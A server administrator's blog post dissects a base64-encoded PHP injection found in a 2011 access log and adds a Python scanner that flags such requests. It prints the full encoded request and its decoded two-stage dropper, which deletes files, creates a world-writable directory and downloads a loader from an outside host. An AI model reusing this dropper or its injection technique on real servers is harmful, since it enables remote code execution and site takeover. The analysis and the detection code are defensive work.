Daily !fun with server logs
Friday, September 9, 2011 5:10:05 AM
GET /engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei5mYzFjMGNhYTNlOWYwMGZmMTk4OWJlZjM2NTViMjE3NS5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5hM051ZFhKb0p6c0tKRzVsZDBScGNpQTlJQ2RyYzI1MWNtZ25Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxtWmpNV013WTJGaE0yVTVaakF3Wm1ZeE9UZzVZbVZtTXpZMU5XSXlNVGMxTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ== HTTP/1.1
The user_id doesn't look like a normal user ID at all; it looks like a base-something encoded blob, so let's try base64 first:
GET /engine/ajax/updates.php?wert=1&user_id=@ini_set('allow_url_fopen', 1);
$uploadDir = '../../uploads';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';
if (is_dir($uploadDir))
{
$fp = fopen("$uploadDir/$loaderName", 'w');
fwrite($fp, base64_decode('
[inner base64 string not reproduced here; it is decoded in the next step]
'));
fclose($fp);
print '91746876256484';
} HTTP/1.1
Whoops, a direct hit, that was easy.
Someone wants to write a file. Relative to /engine/ajax/, where the script lives, ../../uploads is the uploads directory two levels up, presumably right under the web root, so the dropped loaderz.*.php would be reachable by URL. Let's decode the inner base64 to see what it writes there.
Warning! Don't follow the URL in the following section unless you know exactly what you are doing!
At the time I tested it, the site was definitely riddled with malware in some sections (at least two Trojans), so make sure you have good anti-virus protection and a system backup, and don't use a production system.
GET /engine/ajax/updates.php?wert=1&user_id=@ini_set('allow_url_fopen', 1);
$uploadDir = '../../uploads';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';
if (is_dir($uploadDir))
{
$fp = fopen("$uploadDir/$loaderName", 'w');
fwrite($fp, <?php
@ini_set('allow_url_fopen', 1);
$oldDir = 'ksnurh';
$newDir = 'ksnurh';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';
@exec("rm -rf $oldDir $newDir *loaderz*");
@system("rm -rf $oldDir $newDir *loaderz*");
@rmdir($oldDir);
@rmdir($newDir);
@unlink($loaderName);
if (!@is_dir($newDir))
{
$old_umask = @umask(0);
@mkdir($newDir, 0777);
@umask($old_umask);
@exec("chmod 777 $newDir");
}
if (@is_dir($newDir))
{
$fp = fopen("$newDir/index.php", 'w');
fwrite($fp, file_get_contents('http://dogiserver.com/control/loader.php?password=JHGBVjkhsi8yhu65t3uyg&action=index'));
fclose($fp);
if (@file_exists("$newDir/index.php"))
{
print '91746876256484';
}
@unlink($loaderName);
}
?>);
fclose($fp);
print '91746876256484';
} HTTP/1.1
I stopped here because our system returns the usual error for this kind of request. Out of personal interest I set a flag on such requests to see whether they evolve.
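Automating the two decoding passes done by hand above and flagging such requests in a log, as an added example that is not part of the original post: the scanner URL-decodes every query parameter, base64-decodes anything that looks like base64, keeps unwrapping nested base64_decode('...') literals the way the inner stage was unwrapped above, and reports the PHP markers and download URLs it finds. Function names are the example's own, and the log lines are constructed, not real traffic.

```python
"""Flag requests whose query parameters base64-decode to PHP source.

Added example, not code from the original post: it automates the two decoding
passes done by hand above (outer base64 in user_id, then the inner
base64_decode('...') literal the outer stage writes to disk).  Names are this
example's own; the log lines below are constructed, not real traffic.
"""
import base64
import re
from typing import Optional
from urllib.parse import unquote

# Strings that mark PHP source rather than an ordinary user id.
PHP_MARKERS = ("<?php", "@ini_set", "eval(", "fopen(", "fwrite(", "unlink(",
               "base64_decode(", "file_get_contents(", "exec(", "system(")
# A plausible base64 token: alphabet only, at least 16 chars, optional padding.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
# A nested stage: base64_decode('...') with a literal string argument.
NESTED_B64 = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)")
# The request target between method and protocol in a Combined Log Format line.
REQUEST_LINE = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')
# Anything a stage would fetch from elsewhere (second-stage download URLs).
URL_IN_CODE = re.compile(r"https?://[^\s'\"()]+")


def try_base64(value: str) -> Optional[str]:
    """Decode value as base64 text; None if it is not base64 or not text.

    Whitespace is dropped first: PHP's base64_decode() ignores characters outside
    the alphabet in its default non-strict mode, so a '+' that reached $_GET as a
    space still decodes server-side, and log viewers wrap long tokens with spaces.
    """
    token = "".join(value.split())
    token += "=" * (-len(token) % 4)          # tolerate stripped padding
    if not B64_TOKEN.match(token):
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def unwrap_stages(code: str, max_depth: int = 5) -> list:
    """Return code plus every nested base64_decode('...') literal, decoded recursively."""
    stages = [code]
    if max_depth == 0:
        return stages
    for match in NESTED_B64.finditer(code):
        inner = try_base64(match.group(1))
        if inner is not None:
            stages.extend(unwrap_stages(inner, max_depth - 1))
    return stages


def analyze_target(target: str) -> list:
    """Check every query parameter of a request target; report those that decode to PHP."""
    findings = []
    query = target.partition("?")[2]
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        decoded = try_base64(unquote(raw))    # unquote, not unquote_plus: '+' is base64 here
        if decoded is None:
            continue
        stages = unwrap_stages(decoded)
        markers = sorted({m for stage in stages for m in PHP_MARKERS if m in stage})
        if markers:
            findings.append({
                "param": name,
                "stages": len(stages),
                "markers": markers,
                "urls": sorted({u for stage in stages for u in URL_IN_CODE.findall(stage)}),
            })
    return findings


def scan_log(lines) -> list:
    """One record per log line whose request carries a base64-wrapped PHP payload."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            target = match.group(1)
            findings = analyze_target(target)
            if findings:
                hits.append({"line": lineno, "path": target.partition("?")[0],
                             "findings": findings})
    return hits


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample traffic (not the real log line from the post).  Request 2
# carries a two-stage payload shaped like the one dissected above: an outer stage
# that drops a file and an inner stage, base64 inside base64, that fetches a loader.
INNER_STAGE = ("<?php\n@ini_set('allow_url_fopen', 1);\n"
               "$fp = fopen('ksnurh/index.php', 'w');\n"
               "fwrite($fp, file_get_contents('http://dropper.invalid/loader.php'));\n?>")
OUTER_STAGE = ("@ini_set('allow_url_fopen', 1);\n"
               "$fp = fopen('../../uploads/loaderz.php', 'w');\n"
               "fwrite($fp, base64_decode('" + _b64(INNER_STAGE) + "'));\nfclose($fp);")
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Sep/2011:05:09:58 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=42 HTTP/1.1" 200 17',
    '203.0.113.7 - - [09/Sep/2011:05:10:05 +0200] "GET /engine/ajax/updates.php?wert=1&user_id='
    + _b64(OUTER_STAGE) + ' HTTP/1.1" 500 0',
    # benign base64 ("hello world this is fine"): decodes to text but no PHP, so not flagged
    '198.51.100.3 - - [09/Sep/2011:05:11:00 +0200] "GET /search.php?q=aGVsbG8gd29ybGQgdGhpcyBpcyBmaW5l HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["path"], hit["findings"])
```

Run stand-alone, the script reports only the second request: parameter user_id, two stages, the PHP markers from both stages, and the loader URL the inner stage would fetch. The benign base64 in the third request decodes cleanly but carries no PHP markers, which is the false positive a marker list guards against; a stricter deployment would also match on the target script path, since an AJAX endpoint that accepts a multi-kilobyte user_id is a signal on its own.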
My opinion about the server-side requirements for this attack to work:
I really don't know who had the stupid idea to use a PHP AJAX script in a CMS or plug-in that base64-decodes the user_id token and then evals it. Passing unsanitized input to eval() hands a remote attacker code execution outright; SQL injection is the least of the attacks it opens the door to, and I can imagine no good reason to ever do it.
More:
Why is the uploads directory inside the publicly served part of the site, configured so that a request for a file in it executes the PHP? That is an absolute no-go, and I wonder whether this kind of attack ever worked on a system that was set up by someone with real knowledge.
Any hints as to which application, CMS or AJAX script is the one being attacked, or causes this?
I'd like to inform the author about this issue.